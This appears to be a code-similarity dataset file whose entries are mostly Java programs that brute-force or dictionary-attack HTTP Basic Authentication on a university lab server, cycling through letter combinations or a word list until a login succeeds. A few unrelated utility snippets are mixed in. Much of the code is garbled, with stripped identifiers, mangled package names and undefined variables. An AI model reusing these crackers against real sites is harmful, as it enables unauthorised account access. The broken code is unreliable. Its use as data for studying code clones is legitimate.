\ }\n \n \n \n private void breakPassword() {\n int j;\n \n breakOneLetterPassword();\n\
\ \n breakTwoLetterPassword();\n \n \n \n\n passwordCrackThreadF\
\ = new PasswordCrackThreadF(0,26,counter++,passwordLetters,userName,this);\n\
\ \n passwordCrackThreadM = new PasswordCrackThreadM(26,52,counter++,passwordLetters,userName,this);\n\
\ \n passwordCrackThreadF.print();\n passwordCrackThreadM.print();\n\
\ }\n \n \n private void breakOneLetterPassword() { \n MyHttpURLConnection\
\ httpURLConnection;\n try {\n\t \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u = (HttpURLConnection)url.openConnection();\n\t u.setRequestProperty(\"\
Authorization\", \" \" + passBase64);\n } catch (IOException io) {io.printStackTrace();}\n\
\ \n loop: for (int i=0;i<52;i++) {\n password\
\ = passwordLetters[i];\n\t\t \n\t\t password =\":\"+ password;\n \
\ try {\n \n\t \t u= (HttpURLConnection)url.openConnection();\n\
\t\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\
\t\t u.connect();\t\n\t\t noOfAttempts++; \n\t\t if (u.getContentLength()\
\ != 0) {\n\t\t \n\t\t if (u.getResponseCode()== HttpURLConnection.HTTP_OK\
\ ) {\n\t\t \n\t System.out.println (\"Your User\
\ Name : Password is \"+password);\n\t\t\t\t System.out.println(\" \");\n\t\
\t\t System.out.println(\" of Attempts / Requests \"+ noOfAttempts);\n\
\t\t\t \n\t\t\t System.exit(0);\n \n\t \
\ }\n\t\t }\n\t\t } catch (ProtocolException px) {px.printStackTrace();\n\
\ \n } catch ( NoRouteToHostException nr)\
\ {nr.printStackTrace();\n\t } catch (BindException e){e.printStackTrace();\n\
\t } catch (IndexOutOfBoundsException e3){e3.printStackTrace();\n\t\
\ } catch (IOException io) {io.printStackTrace();\n\t\t \n\t \
\ } finally {u.disconnect();\n\t }\n } \n }\n \n \
\ \n private void breakTwoLetterPassword() { \n MyHttpURLConnection \
\ httpURLConnection; \n try {\n\t \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u = (HttpURLConnection)url.openConnection();\n\t u.setRequestProperty(\"\
Authorization\", \" \" + passBase64);\n } catch (IOException io) {io.printStackTrace();}\n\
\n \n loop: for (int i=0;i<52;i++) {\n for (int j=0;j<52;j++)\
\ {\n password = passwordLetters[i]+passwordLetters[j];\n\t\t\
\ \n\t\t password =\":\"+ password;\n\t\t \n\t\t \n\t \n \
\ try {\n\t\t u= (HttpURLConnection)url.openConnection();\n\
\t\t\t passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u.setRequestProperty(\"Authorization\", \"\
\ \" + passBase64);\n\t\t\tu.connect();\n\t\t\tnoOfAttempts++;\n\t\t\t\n \
\ \t if (u.getContentLength() != 0) {\n\t\t if (u.getResponseCode()==\
\ HttpURLConnection.HTTP_OK ) {\n\t System.out.println\
\ (\"Your User Name : Password is \"+password); \n\t\t\t System.out.println(\"\
\ \");\n\t\t\t System.out.println(\" of Attempts / Requests \"+ noOfAttempts);\n\
\t\t\t \n\t\t\t System.exit(0);\n\t }\n\t\t }\n\
\t\t \n\t\t\n\t } catch (ProtocolException px) {px.printStackTrace();\n\
\ } catch ( NoRouteToHostException nr) {nr.printStackTrace();\n\
\t } catch (BindException e){e.printStackTrace();\n\t } catch\
\ (IndexOutOfBoundsException e3){e3.printStackTrace();\n\t } catch\
\ (IOException io) {io.printStackTrace();\n\t\t \n\t } finally {u.disconnect();\n\
\t }\n } \n }\n\n\n }\n}\n\nclass PasswordCrackThreadF\
\ extends Thread {\n \n \n \n private String passwordLetters[] ;\n \
\ private String password=\" \";\n private static String userName=\"\";\n\
\ private MyHttpURLConnection httpURLConnection;\n private URL url;\n\
\ \n BruteForce bruteForce;\n int count; \n String passBase64;\n \
\ private HttpURLConnection u;\n \n int start,stop;\n \n static boolean\
\ found;\n \n PasswordCrackThreadF(int start,int stop,int counter,String[]\n\
\ passwordLetters,String userName,BruteForce\
\ bruteForce) {\n this.start = start;\n this.stop = stop;\n \
\ this.passwordLetters =passwordLetters;\n this.userName=userName;\n \
\ count =counter;\n this.bruteForce=bruteForce; \n bruteForce.threadF=true;\n\
\t\n \n passBase64 = new bruteForce.misc.BASE64Encoder().encode(password.getBytes());\n\
\ try {\n\t \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n\n\t u = (HttpURLConnection)url.openConnection();\n \
\ \n\t u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\t\
\ \n\n } catch (IOException io) {io.printStackTrace();}\n\n }\n \n\
\ public synchronized void run() {\n \n outer : for (int i=0; i<stop;i++)\
\ {\n for (int j=0;j<52;j++) {\n for (int\
\ k=0;k<52;k++) {\n password = passwordLetters[i]+passwordLetters[j]+passwordLetters[k];\n\
\ \t password =\":\"+ password;\n\t\t\t \n\t\t\t\n\t\t\t\n\t\
\t\t while (!(bruteForce.threadF)) {\n\t\t\t try { wait(1); }\n\t\t\t \
\ catch (InterruptedException e){}\n\t\t\t } \n\t\t\t \n\t\t\t if (found)\n\
\t\t\t System.exit(0);\n try { \n\t\t\t \
\ u = (HttpURLConnection)url.openConnection();\n\t\t\t passBase64 = new\
\ url.misc.BASE64Encoder().encode(password.getBytes());\n \
\ u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\t\t\
\t \n\n\t\t\t\n u.connect();\n\t\t\t\t\n\
\t\t BruteForce.noOfAttempts++;\n\n\t\t if (u.getContentLength()\
\ != 0) {\n\n\t\t if (u.getResponseCode() == HttpURLConnection.HTTP_OK\
\ ) {\n\t\t\t\t found=true;\n\t\t\t\t \n\t\t\t\t \n\t\t\t\t\t\n\t\t\t\t\
\t \n\t\t\t\t\t\n\t\t System.out.println (\"Your User\
\ Name : Password is \"+password+ \n\t\t \" \
\ \"+ \" Found by Thread \"+count);\n\t\t\t\t\tSystem.out.println(\" \");\n\
\t\t\t System.out.println(\" of Attempts / Requests \"+ BruteForce.noOfAttempts);\n\
\t\t\t\t \t \n \t\t System.exit(0);\n\n\t \
\ }\n\t\t }\n\t\t \n\t\t \t\t \n\t \
\ } catch (ProtocolException px) {px.printStackTrace();\n \
\ } catch ( NoRouteToHostException nr){k--; \n\t\t\t nr.printStackTrace();\n\
\ } catch (BindException e){e.printStackTrace();\n\t \
\ } catch (IndexOutOfBoundsException e3){e3.printStackTrace();\n\
\t } catch (IOException io) {io.printStackTrace();\n\t\t\t \n\
\t } finally {u.disconnect();\n\t }\n\t\t\t bruteForce.threadF=false;\n\
\t\t\t bruteForce.threadM=true;\n\t\t\t\n\t\t\t notifyAll();\n\t\t\t\n \
\ }\n\t\t \n }\n System.out.println(\"End\");\n }\n }\n\
}\n\n\nclass PasswordCrackThreadM extends Thread {\n \n \n \n private\
\ String passwordLetters[] ;\n private String password=\" \";\n private static\
\ String userName=\"\";\n private MyHttpURLConnection httpURLConnection;\n\
\ private URL url;\n String passBase64;\n private URLAuthenticator urlAuthenticator\
\ = new URLAuthenticator(userName);\n BruteForce bruteForce;\n int count;\
\ \n private HttpURLConnection u;\n \n int start,stop;\n \n static\
\ boolean found;\n \n \n \n PasswordCrackThreadM(int start,int stop,int\
\ counter,String[]\n passwordLetters,String\
\ userName,BruteForce bruteForce) {\n this.start = start;\n this.stop\
\ = stop;\n this.passwordLetters =passwordLetters;\n this.userName=userName;\n\
\ count =counter;\n this.bruteForce=bruteForce; \n try {\n\t\
\ \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n u = (HttpURLConnection)url.openConnection();\n\t \
\ passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n \
\ \n\t u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\
\n\t \n\n\t \n\t \n\n } catch (IOException io) {io.printStackTrace();}\n\
\n }\n \n public synchronized void run() {\n \n outer : for (int\
\ i=0; i<stop;i++) {\n for (int j=0;j<52;j++) {\n \
\ for (int k=0;k<52;k++) {\n password = passwordLetters[i]+passwordLetters[j]+passwordLetters[k];\n\
\ \t password=\":\"+password;\n\t\t\t\n\t \n\
\t\t\t\n\t\t\t\n\t\t\t while (!(bruteForce.threadM)) {\n\t\t\t try { wait(1);\
\ }\n\t\t\t catch (InterruptedException e){}\n\t\t\t }\n\t\t\t \n\t\
\t\t \n\t\t\t if (found)\n\t\t\t System.exit(0);\n \
\ try { u = (HttpURLConnection)url.openConnection();\n\t\t\t \n \
\ passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u.setRequestProperty(\"Authorization\", \"\
\ \" + passBase64);\n\t\t\t \n\n\t\t\t\n \
\ u.connect();\n BruteForce.noOfAttempts++;\n\
\t\t \n\t\t if (u.getContentLength() != 0) {\n\t\
\t\t \n\t\t if (u.getResponseCode() == HttpURLConnection.HTTP_OK\
\ ) {\n\t\t\t\t found=true;\n\t\t\t\t \n\t\t\t\t \n\t\t\t\t\t\n\t\
\t\t\t\t \n\t\t\t\t\t\n\t\t System.out.println (\"Your\
\ User Name : Password is \"+password+ \n\t\t \
\ \" \"+ \" Found by Thread \"+count);\n\t\t\t\t \t \n\t\t\t\t\t \n\t\
\t\t\t\tSystem.out.println(\" \");\n\t\t\t System.out.println(\"\
\ of Attempts / Requests \"+ BruteForce.noOfAttempts);\n \t\t \
\ System.exit(0);\n\n\t }\n\t\t \
\ }\n\t\t \n\t\t \t\t \n\t } catch (ProtocolException\
\ px) {px.printStackTrace();\n } catch ( NoRouteToHostException\
\ nr){k--; \n\t\t\t nr.printStackTrace();\n } catch\
\ (BindException e){e.printStackTrace();\n\t } catch (IndexOutOfBoundsException\
\ e3){e3.printStackTrace();\n\t } catch (IOException io) {io.printStackTrace();\n\
\t\t\t \n\t } finally {u.disconnect();\n\t }\n\
\t\t\t bruteForce.threadF=true;\n\n\t\t\t \n\t\t\t bruteForce.threadM=false;\n\
\t\t\t\n\t\t\t notifyAll();\n\t\t\t\n }\n\t\t \n }\n\
\ System.out.println(\"End\");\n }\n }\n}\n\n\n\n\n\n\n\nclass URLAuthenticator\
\ extends Authenticator {\n private String uName;\n String passwd;\n static\
\ char[] password;\n public URLAuthenticator(String uName) {\n\n this.uName\
\ = uName;\n }\n\n public void setPassword(String passwd) {\n\n\t this.passwd=passwd;\n\
\t password=passwd.toCharArray();\n\n }\n \n public PasswordAuthentication\
\ getPasswordAuthentication() {\n\n\t\n \t\n\t\n\treturn new PasswordAuthentication(uName,password);\n\
\ }\n\n}\n\n\n\n\n \n\nclass MyHttpURLConnection extends HttpURLConnection \
\ {\n public MyHttpURLConnection(URL url) {\n super(url);\n }\n \
\ public void disconnect() {\n }\n\n public boolean usingProxy() {\n \
\ return true;\n }\n public void connect() {\n }\n\n}\n\n"
- source_sentence: "import java.io.*;\nimport java.net.*;\nimport java.*;\nimport\
\ java.Runtime.*;\nimport java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\
import java.net.HttpURLConnection;\n\n\npublic class BruteForce \n{\n String\
\ uname = \"\";\n String pword = \"null\";\n Vector v = new Vector();\n int\
\ runTime;\n \n public void doConnect(String connect, int num)\n {\n \n\
\ String cad = connect;\n \n try\n {\n URL secureSite = new\
\ URL();\n URLConnection connection = secureSite.openConnection();\n\t \n\
\ if (uname != null || pword != null)\n\t {\n\t \n\t for(int i=num;\
\ i<v.size(); i++)\n\t {\n\t pword = (String)v.elementAt(i);\n\t \
\ String up = uname + \":\" + pword;\n String encoding;\n \
\ try\n\t\t{\n\t\t secureSite.misc.BASE64Encoder encoder = (secureSite.misc.BASE64Encoder)\
\ Class.forName(\".misc.BASE64Encoder\").newInstance();\n encoding\
\ = encoder.encode (up.getBytes());\n }\n\t catch (Exception ex)\
\ \n {\n\t\t Base64Converter encoder = new Base64Converter();\n \
\ encoding = encoder.encode(up.getBytes());\n }\n\t connection.setRequestProperty\
\ (\"Authorization\", \" \" + encoding);\n connection.connect();\n \
\ if(connection instanceof HttpURLConnection)\n\t {\n\t HttpURLConnection\
\ httpCon=(HttpURLConnection)connection;\n if(httpCon.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED)\n\
\t\t {\n\t\t System.out.println(\"Not authorized - check for details\" + \"\
\ -Incorrect Password : \" + pword);\n\t\t httpCon.disconnect();\n\t \
\ doConnect(uname, i+1);\n\t }\n\t\telse\n\t\t { \n\t\t System.out.println(\"\
\\n\\n\\nPassword for HTTP Secure Site By BruteForce Attack\");\n \
\ System.out.println( +\"\\tPassword : \"+ pword);\n\t \n \
\ runTime = System.currentTimeMillis() - runTime; \n System.out.println(\"\
Time taken crack password (in seconds)\"+\" : \"+ runTime/1000+\"\\n\"+ \"Tries\
\ taken crack password : \"+ i);\n\t System.exit(0);\n\t }\n\t \
\ }\n\t }\n }\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n\
\ }\n }\n public Vector getPassword()\n {\n try\n {\n makePasswords\
\ mp = new makePasswords();\n mp.makePass();\n\tmp.loadFile();\n v\
\ = mp.getVector();\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n\
\ }\n return v;\n }\n public void setTimeTaken( int time_taken)\n {\n\
\ runTime = time_taken;\n } \n public static void main( String args[] )\
\ throws IOException \n {\n \n try\n {\n runTime1 = System.currentTimeMillis();\
\ \n BruteForce newDo = new BruteForce();\n newDo.setTimeTaken(runTime1);\n\
\ newDo.getPassword();\n String site = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n newDo.doConnect(site, 0);\n }catch(Exception ex)\n {\n System.out.println(\"\
Errrrrrrr\");\n }\n \n\n } \n \n}\n\nclass Base64Converter\n {\n\
\ \n public final char [ ] alphabet = {\n 'A', 'B', 'C',\
\ 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', 'M', 'N', 'O',\
\ 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n \
\ 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i',\
\ 'j', 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v', \n 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n \
\ '4', '5', '6', '7', '8', '9', '+', '/' }; \n \n \n public String\
\ encode ( String s )\n {\n return encode ( s.getBytes\
\ ( ) );\n }\n \n public String encode ( byte [ ] octetString\
\ )\n {\n int bits24;\n int bits6;\n \n\
\ char [ ] out\n = new char [ ( ( octetString.length\
\ - 1 ) / 3 + 1 ) * 4 ];\n \n int outIndex = 0;\n int\
\ i = 0;\n \n while ( ( i + 3 ) <= octetString.length ) {\n\
\ \n bits24=( octetString [ i++ ] & 0xFF ) <<\
\ 16;\n bits24 |=( octetString [ i++ ] & 0xFF ) << 8;\n \n \
\ bits6=( bits24 & 0x00FC0000 )>> 18;\n out [\
\ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000\
\ ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \
\ bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n }\n\
\ \n if ( octetString.length - i == 2 )\n {\n \
\ \n bits24 = ( octetString [ i ] & 0xFF ) <<\
\ 16;\n bits24 |=( octetString [ i + 1 ] & 0xFF ) << 8;\n \
\ bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >>\
\ 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \
\ bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++\
\ ] = '=';\n }\n else if ( octetString.length - i ==\
\ 1 )\n {\n \n bits24 = ( octetString\
\ [ i ] & 0xFF ) << 16;\n bits6=( bits24 & 0x00FC0000 )>> 18;\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n \
\ bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++\
\ ] = '=';\n out [ outIndex++ ] = '=';\n }\n \n\
\ return new String ( out );\n }\n }\n \n \n"
sentences:
- "\nimport java.net.*;\nimport java.io.*;\nimport java.misc.*;\n\npublic class\
\ Dictionary\n{\n public static void main (String args[])\n {\n \n \
\ String file = \"/usr/share/lib/dict/words\";\n FileReader fRead;\n \
\ BufferedReader buf;\n\n try\n {\n fRead = new FileReader(file);\n\
\ buf = new BufferedReader(fRead);\n String Password = \"\";\n\
\ int i=0;\n\n \n while( (Password = buf.readLine()) !=\
\ null)\n {\n i++;\n String a = myurl(\"http://sec-crack.cs.rmit.edu./SEC/2\"\
, \"\", Password, i);\n }\n }\n catch(FileNotFoundException\
\ e)\n {\n System.out.println(\"File not found\");\n }\n \
\ catch(IOException ioe)\n {\n System.out.println(\"IO Error \"\
\ + ioe);\n }\n }\n\n public static String encode (String source)\n \
\ {\n BASE64Encoder enc = new source.misc.BASE64Encoder();\n return(enc.encode(source.getBytes()));\n\
\ }\n\n public static String myurl (String url, String Name, String Password,\
\ int val )\n {\n String thisLine;\n String retVal;\n URL u;\n\
\ URLConnection uc;\n retVal = \"\";\n\n try\n {\n \
\ u = new URL(url);\n try\n {\n uc = u.openConnection();\n\
\ if (Name != null)\n {\n uc.setRequestProperty(\"\
Authorization\", \" \" + encode(Name + \":\" + Password));\n }\n \
\ InputStream content = (InputStream)uc.getInputStream();\n \
\ BufferedReader in = new BufferedReader (new InputStreamReader(content));\n\
\n String line;\n \n while ((line = in.readLine())\
\ != null)\n {\n retVal += line;\n System.out.println(line);\n\
\ System.out.println(\"password=\"+Password+\";number:\"+num);\n\
\ System.exit(0);\n }\n }\n catch (Exception\
\ e)\n {\n ;\n \n }\n }\n catch\
\ (MalformedURLException e)\n {\n return(url + \" is not a parseable\
\ URL\");\n }\n return retVal;\n }\n}\n\n\n"
- "\nimport java.util.*;\n\npublic class CrackThread implements Runnable {\n\n \
\ private String strUsername;\n private String strURL;\n private int iSeed;\n\
\ private int iEnd;\n \n \n public CrackThread() {\n }\n \n\
\ public void setParams(String url, String username, int seed, int end) {\n\
\ strUsername = username;\n strURL = url;\n iSeed = seed;\n\
\ iEnd = end;\n }\n \n public void run() {\n Date dtStart,\
\ dtEnd;\n PasswordGen pwd = new PasswordGen();\n PasswordTest tester;\n\
\ int i=1;\n boolean bDone = false;\n Result res;\n\n \
\ dtStart = new Date();\n \n \n pwd.setSeed(iSeed);\n\
\ \n while(!bDone) {\n tester = new PasswordTest(strURL,\
\ strUsername, pwd.getNextPassword());\n \n bDone = tester;\n\
\ i++;\n \n \n if(i % 100 == 0)\n\
\ {\n System.out.println(pwd.getPassword());\n \
\ }\n \n if(bDone) {\n \n \
\ res = new Result(strURL, strUsername, pwd.getPassword(), dtStart, new\
\ Date(), i);\n System.out.print(res.toString());\n \
\ }\n else\n {\n \n }\n \
\ \n \n if( i >= iEnd) bDone = true;\n } \
\ \n }\n \n}\n"
- "\nimport java.io.*;\nimport java.util.*;\n\npublic class BruteForce\n{\n private\
\ Cracker crack;\n private Vector clients;\n private int num;\n private\
\ int bigStart;\n\n public BruteForce()\n {\n int i, j;\n int start,\
\ finish;\n start=finish = 0;\n \n crack = new Cracker();\n \
\ crack.loadLetters();\n crack.loadPairs();\n crack.loadTriples();\n\
\ num = crack.getVictor().size();\n clients = new Vector( num);\n \
\ j = 0;\n \n bigStart = System.currentTimeMillis();\n for(\
\ i = 0; i < num; i++)\n {\n MyClient2 client = new MyClient2(this,\
\ i + 1, 80, (String)crack.getVictor().elementAt( i));\n \n \
\ clients.add( client);\n\t Thread t = new Thread( client);\n\t t.print();\n\
\ j++;\n if(j == 100)\n {\n t = System.currentTimeMillis();\n\
\ System.out.println(\"i = \"+i+\" \"+(String)crack.getVictor().elementAt(\
\ i));\n finish = t;\n while( (finish - t ) < 1000)\n\
\ {\n finish = System.currentTimeMillis();\n \
\ }\n j = 0;\n }\n \n }\n }\n \n public\
\ void retire(int MyClient2 )\n {\n int bigFinish;\n bigFinish = t.getTime();\n\
\ System.out.println(\" It took \"+(bigFinish - bigStart)/1000+\" \"+\"seconds\
\ crack password using brute force\");\n System.exit(0);\n }\n \n \
\ public static void main (String[] args)\n {\n BruteForce = new BruteForce();\n\
\ }\n}\n \n"
- source_sentence: "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\
\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
sentences:
- "import java.net.*;\nimport java.util.*;\n\npublic class BruteForce {\n\n public\
\ static void main(String[] args) {\n new CrackAttempt();\n }\n}\n\nclass\
\ CrackAttempt {\n public CrackAttempt() {\n final int MAX_LENGTH = 3;\n\
\ boolean auth = false;\n Date = new Date();\n boolean morePasswords\
\ = true;\n int passPtr = 0;\n StringBuffer validChars = new StringBuffer(\"\
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n char[] password\
\ = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n \
\ while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n\
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n } catch (Exception e) {\n\
\ System.out.println(\" was exception: \" + e.getMessage());\n \
\ }\n int count = passPtr;\n while (true) {\n \
\ if (password[count] == validChars.charAt(validChars.length() - 1)) {\n \
\ password[count] = validChars.charAt(0);\n count--;\n\
\ } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count]))\
\ + 1);\n break;\n }\n if (count < 0) {\n\
\ \n if (passPtr < MAX_LENGTH - 1) {\n \
\ passPtr++;\n password[passPtr] = validChars.charAt(0);\n\
\ } else {\n morePasswords = false;\n \
\ }\n break;\n }\n }\n \n }\
\ \n if (!auth) {\n System.out.println(\"Unable determine password\"\
);\n } else {\n time = (new Date()).getTime() - start.getTime();\n\
\ System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds\
\ crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator\
\ {\n char[] password;\n public CrackAuth(char[] password) {\n this.password\
\ = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n\
\ {\n String user = \"\";\n return new PasswordAuthentication(user,\
\ password);\n }\n}\n"
- "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\
\npublic class Dictionary {\n public static void main (String[] args) throws\
\ IOException {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\
\n d = new Date().getTime();\n FileReader fr = new FileReader(\"\
/usr/share/lib/dict/words\");\n BufferedReader bufr = new BufferedReader(fr);\n\
\ String word = bufr.readLine(); \n int total = 960;\n\
\ String[] pws = new String[total];\n int count = 0;\n while\
\ (word!=null){\n if (word.length()<=3) { pws[count] = word; count++;}\n\
\tword = bufr.readLine();\n }\n \n int i=0;\n int response\
\ = 0;\n for (i=0;i<count;i++){\n String uname = \"\";\n String\
\ userinfo = uname + \":\" + pws[i];\n try{\n String encoding =\
\ new bf.misc.BASE64Encoder().encode (userinfo.getBytes());\n URL url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n HttpURLConnection\
\ uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty\
\ (\"Authorization\", \" \" + encoding);\n response = uc.getResponseCode();\n\
\t if (response == 200) break;\n\t else uc.disconnect();\n }\n catch(IOException\
\ e){ System.err.println(e); e.printStackTrace(); } \n catch(IllegalStateException\
\ s){ System.err.println(s); s.printStackTrace(); }\n }\n System.out.println(\"\
Response \"+i+\" was \"+response);\n System.out.println(\"The successful\
\ password was \"+pws[i]);\n finish = new Date().getTime();\n float\
\ totaltime = (float)(finish-d)/1000;\n System.out.println(\"Time taken:\
\ \"+totaltime+ \" seconds.\");\n \n }\n}\n\n"
- " \n\n\n\n\nimport java.util.*;\nimport java.io.*;\n\npublic class MyTimer\n{\t\
\n\n\tpublic static void main(String args[])\n\t{\n\t\tWatchdog watch = new Watchdog();\n\
\t\tTimer time = new Timer();\n\t\ttime.schedule(watch,864000000,864000000);\n\
\t\t\n\t\t\t\n\t}\n}\n"
- source_sentence: "\n\nimport java.io.*;\nimport java.net.*;\nimport java.misc.BASE64Encoder;\n\
\npublic class Dictionary\n{\n public Dictionary()\n {}\n\n public boolean\
\ fetchURL(String urlString,String username,String password)\n {\n StringWriter\
\ sw= new StringWriter();\n PrintWriter pw = new PrintWriter();\n try{\n\
\ URL url=new URL(urlString); \n String userPwd= username+\":\"+password;\n\
\n \n \n \n \n\n BASE64Encoder encoder = new BASE64Encoder();\n\
\ String encodedStr = encoder.encode (userPwd.getBytes());\n System.out.println(\"\
Original String = \" + userPwd);\n\t System.out.println(\"Encoded String = \"\
\ + encodedStr);\n\n HttpURLConnection huc=(HttpURLConnection) url.openConnection();\
\ \n huc.setRequestProperty( \"Authorization\",\" \"+encodedStr); \n\
\ InputStream content = (InputStream)huc.getInputStream();\n BufferedReader\
\ in =\n new BufferedReader (new InputStreamReader (content));\n \
\ String line;\n while ((line = in.readLine()) != null) {\n pw.println\
\ (line);\n System.out.println(\"\");\n System.out.println(sw.toString());\n\
\ }return true;\n } catch (MalformedURLException e) {\n pw.println\
\ (\"Invalid URL\");\n return false;\n } catch (IOException e) {\n \
\ pw.println (\"Error URL\");\n return false;\n }\n\n }\n\n \
\ public void getPassword()\n {\n String dictionary=\"words\";\n String\
\ urlString=\"http://sec-crack.cs.rmit.edu./SEC/2/\";\n String login=\"\"\
;\n String pwd=\" \";\n\n try\n {\n BufferedReader inputStream=new\
\ BufferedReader(new FileReader(dictionary));\n startTime=System.currentTimeMillis();\n\
\ while (pwd!=null)\n {\n pwd=inputStream.readLine();\n \
\ if(this.fetchURL(urlString,login,pwd))\n {\n finishTime=System.currentTimeMillis();\n\
\ System.out.println(\"Finally I gotta it, password is : \"+pwd);\n\
\ System.out.println(\"The time for cracking password is: \"+(finishTime-startTime)\
\ + \" milliseconds\");\n System.exit(1);\n } \n\n }\n\
\ inputStream.close();\n }\n catch(FileNotFoundException e)\n \
\ {\n System.out.println(\"Dictionary not found.\");\n }\n catch(IOException\
\ e)\n {\n System.out.println(\"Error dictionary\");\n }\n }\n\
\n public static void main(String[] arguments)\n {\n BruteForce bf=new BruteForce();\n\
\ bf.getPassword();\n } \n}"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n public class Dictionary {\n int attempts\
\ = 0;\n URLConnection conn = null;\n\n public static void main (String args[]){\n\
\n\tDictionary a = new Dictionary();\n a.attack(args);\n }\n\n public\
\ void attack(String args[]) {\n try {\n String login = new String(\"\"\
);\n String url = new String(\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n String passwd = new String();\n\n\n passwd = getPasswd();\n \
\ BufferedReader in = new BufferedReader( new InputStreamReader (openURLForInput(new\
\ URL(url), login , passwd)));\n\n String line;\n while ((line = in.readLine())\
\ != null) {\n System.out.println(line);\n }\n System.out.println(\"\
Password Cracked Successfully!!!\");\n System.out.println(\"The passsword\
\ is :\" + passwd + \"and got after \" +attempts + \" tries\");\n }\n \
\ catch (IOException e) {\n \n String r = new String(e.getMessage());\n\
\ if ( r != null)\n {\n System.out.println(\"Message :\" +r);\n \
\ Dictionary a = new Dictionary();\n a.attack(args);\n }\n else\n \
\ {\n\tSystem.out.println(\"Trying again\");\n\tDictionary a = new Dictionary();\n\
\ta.attack(args);\n }\n }\n }\n public String getPasswd()\n {\n\n\
\ int i=0;int j=0;\n attempts++;\n int count =0;\n System.out.println(\"Passing\
\ dictionary word and waiting for URL reply....... \");\n String currentword\
\ = \"\";\n String se = \"\";\n try{\n FileInputStream reader = new FileInputStream\
\ (\"words\");\n DataInputStream in = new DataInputStream(reader);\n while (in.available()\
\ !=0)\n{\n currentword = in.readLine();\n count++;\n \n \n }\n }\n catch( IOException\
\ e){}\n\n return currentword;\n\t \n }\n\n\n\n public InputStream openURLForInput\
\ (URL url, String uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setDoInput (true);\n conn.setRequestProperty (\"Authorization\"\
